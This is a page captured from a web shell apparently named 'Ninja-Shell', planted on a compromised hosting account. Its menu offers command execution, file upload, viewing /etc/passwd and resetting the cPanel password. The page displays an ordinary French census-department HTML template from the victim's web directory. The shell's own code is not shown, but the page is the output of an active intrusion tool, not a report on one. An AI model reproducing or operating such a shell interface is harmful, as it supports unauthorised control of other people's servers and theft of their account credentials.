{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: /home/meharicl/www//recensement2/recensement_departements.html
<!DOCTYPE HTML> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>recensement_departements</title> <meta name="GENERATOR" content="CodeCharge Studio 5.1.1.18992"> <script language="JavaScript" type="text/javascript"> //Begin CCS script //Include Common JSFunctions @1-2504AB44 </script> <script src="ClientI18N.php?file=Globalize.js&locale={res:CCS_LocaleID}" type="text/javascript" charset="utf-8"></script> <script type="text/javascript"> //End Include Common JSFunctions //Include User Scripts @1-857041F3 </script> <link rel="stylesheet" type="text/css" href="Styles/None/jquery-ui.css" /> {page:scriptIncludes} <script type="text/javascript"> //End Include User Scripts //Common Script Start @1-8BFA436B jQuery(function ($) { var features = { }; var actions = { }; var params = { }; //End Common Script Start //Controls Selecting @1-5A541DE7 $('body').ccsBind(function() { features["Panel1Panel2DialogPanel1"] = $('*:ccsControl(Panel1, Panel2)'); features["Panel1UpdatePanel1"] = $('*:ccsControl(Panel1)'); features["Panel1condition_for_show"] = $('*:ccsControl(Panel1)'); features["Panel1condition_for_hide"] = $('*:ccsControl(Panel1)'); features["Panel1ccc_link_Condition"] = $('*:ccsControl(Panel1)'); features["Panel1ccc_submit_Condition"] = $('*:ccsControl(Panel1)'); features["Panel1ccc_others_Condition"] = $('*:ccsControl(Panel1)'); }); //End Controls Selecting //Feature Parameters @1-D52610ED params["Panel1Panel2DialogPanel1"] = { title: "Ajouter/Editer Rec Departements ", modal: true, autoOpen: false }; params["Panel1UpdatePanel1"] = { name: "Panel1" }; //End Feature Parameters //Feature Init @1-480F954F features["Panel1Panel2DialogPanel1"].ccsBind(function() { this.ccsDialog(params["Panel1Panel2DialogPanel1"]); }); features["Panel1UpdatePanel1"].ccsBind(function() { this.ccsUpdatePanel(params["Panel1UpdatePanel1"]); }); //End Feature Init //DialogPanel1 show Entry Point @53-C665C449 actions["Panel1Panel2DialogPanel1_show"] = function () { features["Panel1Panel2DialogPanel1"].ccsDialog("show"); return false; }; //End DialogPanel1 show Entry Point //DialogPanel1 hide Entry Point @53-C5416BBC actions["Panel1Panel2DialogPanel1_hide"] = function () { features["Panel1Panel2DialogPanel1"].ccsDialog("hide"); }; //End DialogPanel1 hide Entry Point //condition_for_show start Entry Point Start @26-4617342F actions["Panel1condition_for_show_start"] = function (eventType, parameters) { //End condition_for_show start Entry Point Start //condition_for_show start Entry Point Body @26-F9058955 var self = $("*:ccsSameLevelControl(" + $(this).ccsId() + ", Panel1)"); if (true==(params["click"] == "link")) { self.trigger($.Event("true.condition_for_show"), {}); } else { self.trigger($.Event("false.condition_for_show"), {}); } //End condition_for_show start Entry Point Body //condition_for_show start Entry Point End @26-6A43FC60 }; //End condition_for_show start Entry Point End //condition_for_hide start Entry Point Start @31-5A53631F actions["Panel1condition_for_hide_start"] = function (eventType, parameters) { //End condition_for_hide start Entry Point Start //condition_for_hide start Entry Point Body @31-4B4C4DB5 var self = $("*:ccsSameLevelControl(" + $(this).ccsId() + ", Panel1)"); if (true==(params["click"] == "submit" && $("#ErrorBlock").length == 0)) { self.trigger($.Event("true.condition_for_hide"), {}); } else { self.trigger($.Event("false.condition_for_hide"), {}); } //End condition_for_hide start Entry Point Body //condition_for_hide start Entry Point End @31-6A43FC60 }; //End condition_for_hide start Entry Point End //ccc_link_Condition start Entry Point Start @36-505B3325 actions["Panel1ccc_link_Condition_start"] = function (eventType, parameters) { //End ccc_link_Condition start Entry Point Start //ccc_link_Condition start Entry Point Body @36-4B8521D3 var self = $("*:ccsSameLevelControl(" + $(this).ccsId() + ", Panel1)"); if (true==(params["click"] = "link")) { self.trigger($.Event("true.ccc_link_Condition"), {}); } else { self.trigger($.Event("false.ccc_link_Condition"), {}); } //End ccc_link_Condition start Entry Point Body //ccc_link_Condition start Entry Point End @36-6A43FC60 }; //End ccc_link_Condition start Entry Point End //ccc_submit_Condition start Entry Point Start @47-D5BAC60E actions["Panel1ccc_submit_Condition_start"] = function (eventType, parameters) { //End ccc_submit_Condition start Entry Point Start //ccc_submit_Condition start Entry Point Body @47-D25EF30D var self = $("*:ccsSameLevelControl(" + $(this).ccsId() + ", Panel1)"); if (true==(params["click"] = "submit")) { self.trigger($.Event("true.ccc_submit_Condition"), {}); } else { self.trigger($.Event("false.ccc_submit_Condition"), {}); } //End ccc_submit_Condition start Entry Point Body //ccc_submit_Condition start Entry Point End @47-6A43FC60 }; //End ccc_submit_Condition start Entry Point End //ccc_others_Condition start Entry Point Start @62-52A5E8CF actions["Panel1ccc_others_Condition_start"] = function (eventType, parameters) { //End ccc_others_Condition start Entry Point Start //ccc_others_Condition start Entry Point Body @62-D9CD92AF var self = $("*:ccsSameLevelControl(" + $(this).ccsId() + ", Panel1)"); if (true==(params["click"] = "")) { self.trigger($.Event("true.ccc_others_Condition"), {}); } else { self.trigger($.Event("false.ccc_others_Condition"), {}); } //End ccc_others_Condition start Entry Point Body //ccc_others_Condition start Entry Point End @62-6A43FC60 }; //End ccc_others_Condition start Entry Point End //Event Binding @1-94D9CFC2 features["Panel1condition_for_show"].ccsBind(function() { this.bind("true.condition_for_show", actions["Panel1Panel2DialogPanel1_show"]); }); features["Panel1condition_for_hide"].ccsBind(function() { this.bind("true.condition_for_hide", actions["Panel1Panel2DialogPanel1_hide"]); }); features["Panel1UpdatePanel1"].ccsBind(function() { this.bind("afterrefresh.ccsUpdatePanel", actions["Panel1condition_for_show_start"]); }); features["Panel1UpdatePanel1"].ccsBind(function() { this.bind("afterrefresh.ccsUpdatePanel", actions["Panel1condition_for_hide_start"]); }); features["Panel1Panel2DialogPanel1"].ccsBind(function() { this.bind("show.ccsDialog", actions["Panel1ccc_others_Condition_start"]); }); features["Panel1Panel2DialogPanel1"].ccsBind(function() { this.bind("hide.ccsDialog", actions["Panel1ccc_others_Condition_start"]); }); $('*:ccsControl(Panel1, rec_departements, rec_departements_Insert)').ccsBind(function() { this.bind("click", actions["Panel1ccc_link_Condition_start"]); }); $('*:ccsControl(Panel1, rec_departements, departement_id)').ccsBind(function() { this.bind("click", actions["Panel1ccc_link_Condition_start"]); }); $('*:ccsControl(Panel1, Panel2, rec_departements1)').ccsBind(function() { this.bind("submit", actions["Panel1ccc_submit_Condition_start"]); }); //End Event Binding //Plugin Calls @1-F4371B70 $('*:ccsControl(Panel1, Panel2, rec_departements1, Button_Delete)').ccsBind(function() { this.bind("click", function(){ $("body").data("disableValidation", true); }); }); //End Plugin Calls //Common Script End @1-562554DE }); //End Common Script End //End CCS script </script> </head> <body> <!-- BEGIN Panel Panel1 --> <!-- BEGIN Grid rec_departements --> <h2>Liste des Départements</h2> <table> <tr> <th scope="col">Departement Id</th> <th scope="col">Num Departement</th> <th scope="col">Region Id</th> <th scope="col">Departement Nom</th> </tr> <!-- BEGIN Row --> <tr> <td style="TEXT-ALIGN: right"><a href="{departement_id_Src}" id="Panel1rec_departementsdepartement_id_{rec_departements:rowNumber}">{departement_id}</a> </td> <td>{num_departement} </td> <td style="TEXT-ALIGN: right">{region_id} </td> <td>{departement_nom} </td> </tr> <!-- END Row --> <!-- BEGIN NoRecords --> <tr> <td colspan="4">Aucun enregistrement</td> </tr> <!-- END NoRecords --> <tr> <td colspan="4"><a href="{rec_departements_Insert_Src}" id="Panel1rec_departementsrec_departements_Insert">Ajouter Nouveau</a> </td> </tr> </table> <!-- END Grid rec_departements --><br> <!-- BEGIN Panel Panel2 --> <!-- BEGIN Record rec_departements1 --> <form id="Panel1Panel2rec_departements1" method="post" name="{HTMLFormName}" action="{Action}"> <h2>Ajouter/Editer Rec Departements </h2> <table> <!-- BEGIN Error --> <tr id="ErrorBlock"> <td colspan="2">{Error}</td> </tr> <!-- END Error --> <tr> <td><label for="Panel1Panel2rec_departements1num_departement">Num Departement</label></td> <td><input type="text" id="Panel1Panel2rec_departements1num_departement" maxlength="3" size="3" value="{num_departement}" name="{num_departement_Name}"></td> </tr> <tr> <td><label for="Panel1Panel2rec_departements1region_id">Region Id</label></td> <td><input type="text" id="Panel1Panel2rec_departements1region_id" maxlength="10" size="10" value="{region_id}" name="{region_id_Name}"></td> </tr> <tr> <td><label for="Panel1Panel2rec_departements1departement_nom">Departement Nom</label></td> <td><input type="text" id="Panel1Panel2rec_departements1departement_nom" maxlength="32" size="32" value="{departement_nom}" name="{departement_nom_Name}"></td> </tr> <tr> <td style="TEXT-ALIGN: right" colspan="2"> <!-- BEGIN Button Button_Insert --><input type="image" id="Panel1Panel2rec_departements1Button_Insert" style="BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-TOP-WIDTH: 0px" alt="Insérer" src="Styles/None/Images/fr/ButtonInsert.gif" value="Insérer" name="{Button_Name}"><!-- END Button Button_Insert --> <!-- BEGIN Button Button_Update --><input type="image" id="Panel1Panel2rec_departements1Button_Update" style="BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-TOP-WIDTH: 0px" alt="Mettre à Jour" src="Styles/None/Images/fr/ButtonUpdate.gif" value="Mettre à Jour" name="{Button_Name}"><!-- END Button Button_Update --> <!-- BEGIN Button Button_Delete --><input type="image" id="Panel1Panel2rec_departements1Button_Delete" style="BORDER-LEFT-WIDTH: 0px; BORDER-RIGHT-WIDTH: 0px; BORDER-BOTTOM-WIDTH: 0px; BORDER-TOP-WIDTH: 0px" alt="Supprimer" src="Styles/None/Images/fr/ButtonDelete.gif" value="Supprimer" name="{Button_Name}"><!-- END Button Button_Delete --></td> </tr> </table> </form> <!-- END Record rec_departements1 --><!-- END Panel Panel2 --><br> <!-- END Panel Panel1 --> </body> </html>
./Ninja\.